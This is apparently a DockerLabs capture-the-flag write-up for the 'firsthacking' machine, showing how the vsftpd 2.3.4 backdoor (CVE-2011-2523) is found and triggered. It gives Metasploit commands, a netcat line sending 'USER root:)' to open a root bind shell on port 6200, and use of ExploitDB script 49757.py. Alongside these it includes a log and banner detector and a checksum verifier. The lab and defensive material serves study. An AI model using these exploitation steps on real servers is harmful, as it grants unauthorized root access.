
firsthacking is a Very Easy DockerLabs machine built around one of the most famous backdoors in Linux history: vsftpd 2.3.4. A malicious version of the popular FTP daemon was briefly distributed in 2011 with a hidden backdoor that opens a root shell on port 6200 when a username ending in :) is submitted. This machine teaches you how to find and weaponise a known CVE using both Metasploit and a manual netcat approach — reinforcing the lesson that understanding the underlying mechanism is just as important as running the automated exploit.
Machine Info

| Field | Details |
|---|---|
| Difficulty | Very Easy (Muy Fácil / Súper Fácil) |
| Category | Hacking Infraestructura |
| OS | Linux |
| Key Techniques | Service enumeration, vsftpd 2.3.4 backdoor (CVE-2011-2523), Metasploit, netcat, searchsploit |
| Default Target IP | 172.17.0.2 |

Phase 0: Launch Kali Portable

Open a second terminal and start your Kali Portable environment:
./run-kali.sh normal
All subsequent commands run inside this session.

Phase 1: Deploy the Machine

Download firsthacking.zip from DockerLabs. In your first terminal:
unzip firsthacking.zip
chmod +x auto_deploy.sh
./auto_deploy.sh firsthacking.tar
You receive two files:
  • auto_deploy.sh — Deploys the vulnerable container
  • firsthacking.tar — The Docker image

Phase 2: Reconnaissance

1. Ping Check

Verify the container is reachable:
ping -c 3 172.17.0.2

2. Nmap Service Scan

Scan the target's default port range at an aggressive rate to identify open services and their versions:
nmap -sC -sV --min-rate 5000 172.17.0.2

| Argument | Meaning |
|---|---|
| -sC | Default NSE scripts |
| -sV | Service and version detection |
| --min-rate 5000 | Fast scan suitable for local lab environments |

Findings:

| Port | Service | Version |
|---|---|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
Only port 21 (FTP) is open, running vsftpd 2.3.4 — exactly the backdoored version. This is the entire attack surface.
Use --min-rate only in controlled lab environments. In real engagements, aggressive scanning rates can saturate the network, trigger IDS alerts, and get your source IP blocked automatically.

Phase 3: Exploitation — Two Methods

The vsftpd 2.3.4 backdoor (CVE-2011-2523) works by detecting a smiley face (:)) at the end of the username during FTP authentication. When it detects this string, the daemon opens a bind shell on TCP port 6200 in the background. The attack can be carried out with Metasploit or entirely manually with netcat.
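The mechanism just described also gives a defender two cheap things to look for: the `:)` pair inside a USER command in the FTP daemon's command log, and an FTP greeting that advertises the affected version during inventory scans. The following script is an added example written for this write-up, not code from DockerLabs or the machine; the log lines and banners it checks are constructed, and the log format assumes vsftpd.log with `log_ftp_protocol=YES` enabled.

```python
"""Detect the CVE-2011-2523 trigger string and the vulnerable vsftpd banner.

Added example for this write-up, not part of DockerLabs or the machine.
Two defender-side checks:
  1. FTP command-log lines where a USER command carries ':)'.
  2. FTP greetings that advertise vsftpd 2.3.4.
Sample log lines and banners are constructed; the log layout assumes
vsftpd.log with log_ftp_protocol=YES.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

TRIGGER = ":)"                # byte pair the backdoor watches for in USER
VULNERABLE_VERSION = "2.3.4"  # only this release shipped the backdoor

# Assumed vsftpd.log line shape with protocol logging, e.g.
#   Tue Jan 10 10:05:01 2023 [pid 202] FTP command: Client "172.17.0.1", "USER root:)"
CMD_RE = re.compile(
    r'^(?P<ts>.+?) \[pid \d+\] FTP command: Client "(?P<client>[^"]+)", "USER (?P<user>[^"]*)"$'
)
# FTP greeting such as "220 (vsFTPd 2.3.4)"
BANNER_RE = re.compile(r"vsFTPd\s+(?P<ver>\d+(?:\.\d+)+)", re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    timestamp: str
    client: str
    username: str


def has_trigger(username: str) -> bool:
    """True when the username carries the ':)' pair.

    The write-up places ':)' at the end of the username; matching the pair
    anywhere in the field is the stricter detection rule and costs nothing.
    """
    return TRIGGER in username


def scan_ftp_log(lines: Iterable[str]) -> List[Alert]:
    """Return one Alert per USER command that carries the trigger string."""
    alerts = []
    for line in lines:
        m = CMD_RE.match(line.rstrip("\n"))
        if m and has_trigger(m.group("user")):
            alerts.append(Alert(m.group("ts"), m.group("client"), m.group("user")))
    return alerts


def banner_is_vulnerable(banner: str) -> bool:
    """True when an FTP greeting advertises exactly vsftpd 2.3.4."""
    m = BANNER_RE.search(banner)
    return m is not None and m.group("ver") == VULNERABLE_VERSION


# Constructed sample data, not real logs from the lab container.
SAMPLE_LOG = [
    'Tue Jan 10 10:00:00 2023 [pid 201] CONNECT: Client "172.17.0.1"',
    'Tue Jan 10 10:00:01 2023 [pid 201] FTP command: Client "172.17.0.1", "USER anonymous"',
    'Tue Jan 10 10:00:02 2023 [pid 201] FTP command: Client "172.17.0.1", "PASS <password>"',
    'Tue Jan 10 10:05:00 2023 [pid 202] CONNECT: Client "172.17.0.1"',
    'Tue Jan 10 10:05:01 2023 [pid 202] FTP command: Client "172.17.0.1", "USER root:)"',
    'Tue Jan 10 10:05:02 2023 [pid 202] FTP command: Client "172.17.0.1", "PASS <password>"',
]
SAMPLE_BANNERS: Dict[str, str] = {
    "lab": "220 (vsFTPd 2.3.4)",
    "patched": "220 (vsFTPd 2.3.5)",
    "other": "220 ProFTPD Server ready.",
}

if __name__ == "__main__":
    for a in scan_ftp_log(SAMPLE_LOG):
        print(f"ALERT {a.timestamp} client={a.client} user={a.username!r}")
    for host, banner in SAMPLE_BANNERS.items():
        state = "VULNERABLE" if banner_is_vulnerable(banner) else "ok"
        print(f"{host}: {state}  {banner}")
```

Run against a real vsftpd.log the script only needs the file's lines piped into `scan_ftp_log`; a match on port 21 followed shortly by a new listener on TCP 6200 on the same host is the full signature of a triggered backdoor.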

Method A: Metasploit (Automated)

1. Launch Metasploit and Find the Module

Open Metasploit and search for the vsftpd exploit:
msfconsole
search vsftpd 2.3.4
The module exploit/unix/ftp/vsftpd_234_backdoor appears in the results.

2. Load and Configure the Module

Select the exploit:
use exploit/unix/ftp/vsftpd_234_backdoor
# Equivalent shorthand: use 0
Review the options:
show options
Set the target and your local hosts:
set RHOST 172.17.0.2
set LHOST 172.17.0.1

3. Run the Exploit

exploit
If Metasploit successfully triggers the backdoor, you will receive a command shell session. However, due to timing nuances with the backdoor’s bind shell behaviour, Metasploit does not always open the session automatically — if it stalls, proceed to Method B below.
Method B: Manual Exploitation with netcat

When Metasploit fails to establish the session cleanly, the manual approach is more reliable. This method also gives you a much deeper understanding of how the backdoor actually works.

1. Trigger the Backdoor via FTP

Send a specially crafted FTP authentication sequence using netcat. The :) at the end of the username is the trigger:
(echo "USER root:)"; sleep 1; echo "PASS test") | nc 172.17.0.2 21

| Part | Purpose |
|---|---|
| echo "USER root:)" | Sends a username ending with :) to trigger the backdoor |
| sleep 1 | Pauses to let vsftpd process the smiley and open port 6200 |
| echo "PASS test" | Sends any password (the value does not matter) |
| nc 172.17.0.2 21 | Connects to the FTP service on port 21 |

In the background, vsftpd opens a root bind shell on port 6200.

2. Connect to the Bind Shell

In a new terminal window, connect to the now-open port 6200:
nc -v 172.17.0.2 6200
You land in an interactive shell session. Verify your identity:
whoami
# root

Method C: Python Exploit via Searchsploit

A third option uses the public Python exploit from ExploitDB:
searchsploit vsftpd 2.3.4
Copy the Python exploit to your working directory:
cp /usr/share/exploitdb/exploits/unix/remote/49757.py .
Run it against the target:
python3 49757.py 172.17.0.2
The script handles the trigger and connection automatically, dropping you into a root shell.

Phase 4: Verification and Flag

Regardless of which method you used, verify root access and capture the flag:
whoami
# root

id
# uid=0(root) gid=0(root) groups=0(root)

ls /root
cat /root/flag.txt

Post-Lab Cleanup

Return to the deploy terminal and press Ctrl+C to stop the container. Type exit in your Kali Portable session.

Key Takeaways

CVE-2011-2523: A Real Backdoor

The vsftpd 2.3.4 backdoor is not a hypothetical scenario — it was a real supply-chain attack where a malicious version of the software was briefly served from the official download mirror. Always verify checksums of downloaded software.
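What "verify checksums" looks like in practice is the logic behind `sha256sum -c`: parse a published sums file, hash the download in chunks, and compare digests in constant time, refusing files that are not listed at all. The script below is an added example for this write-up, not code from DockerLabs or the vsftpd project; the tarball bytes and sums file it checks are constructed in a temporary directory, and the filename vsftpd-2.3.4.tar.gz is just a stand-in.

```python
"""Verify a downloaded archive against a published SHA-256 sums file.

Added example for this write-up, not project code. Reproduces what
`sha256sum -c` does: parse "<hex digest>  <filename>" lines, hash the file
in chunks, and compare with a constant-time comparison. The archive bytes
and the sums file used in demo() are constructed.
"""
import hashlib
import hmac
import os
import tempfile
from typing import Dict

HEX = set("0123456789abcdefABCDEF")


def parse_sums_file(text: str) -> Dict[str, str]:
    """Map filename -> expected hex digest from sha256sum-style lines."""
    expected: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)            # digest, then filename
        if len(parts) != 2:
            raise ValueError(f"malformed sums line: {line!r}")
        digest, name = parts[0], parts[1].lstrip("*")   # '*' marks binary mode
        if len(digest) != 64 or not set(digest) <= HEX or not name:
            raise ValueError(f"malformed sums line: {line!r}")
        expected[name] = digest.lower()
    return expected


def sha256_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hex SHA-256 of a file, read in chunks so large tarballs fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: str, sums_text: str) -> bool:
    """True only if the file is listed in the sums file and its digest matches."""
    expected = parse_sums_file(sums_text)
    name = os.path.basename(path)
    if name not in expected:
        return False                           # unlisted file: treat as unverified
    return hmac.compare_digest(sha256_of_file(path), expected[name])


def demo() -> Dict[str, bool]:
    """Constructed scenario: genuine bytes, then a modified build under the same name."""
    genuine = b"constructed stand-in for a genuine release tarball\n"
    tampered = genuine + b"constructed extra bytes standing in for a modified build\n"
    # Sums file as it would be published for the genuine release (constructed).
    sums_text = f"{hashlib.sha256(genuine).hexdigest()}  vsftpd-2.3.4.tar.gz\n"
    results: Dict[str, bool] = {}
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "vsftpd-2.3.4.tar.gz")
        with open(path, "wb") as f:
            f.write(genuine)
        results["genuine"] = verify_download(path, sums_text)
        with open(path, "wb") as f:           # same filename, different contents
            f.write(tampered)
        results["tampered"] = verify_download(path, sums_text)
        unlisted = os.path.join(d, "other.tar.gz")
        with open(unlisted, "wb") as f:
            f.write(genuine)
        results["unlisted"] = verify_download(unlisted, sums_text)
    return results


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case}: {'OK' if ok else 'REJECTED'}")
```

The comparison only means something when the expected digest comes from a channel the attacker did not control (a signed release announcement, a separately hosted sums file, or a signature checked against a key you already trust); a sums file served from the same compromised mirror as the tarball proves nothing.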

Three Paths to the Same Root

This machine is an excellent exercise in tool flexibility. Metasploit automates the attack, manual netcat teaches the underlying mechanism, and the Python script shows how standalone PoC exploits work. Learn all three approaches.

Bind Shells vs Reverse Shells

The vsftpd backdoor opens a bind shell — it listens on the target for your incoming connection. A reverse shell is the opposite: the target connects back to you. Bind shells are blocked more often by firewalls; reverse shells are preferred in real engagements.

Keep Software Updated

The fix for CVE-2011-2523 was removing the backdoor in vsftpd 2.3.5. Outdated or unmaintained services in production environments are a leading cause of successful breaches. Always patch and verify software integrity.
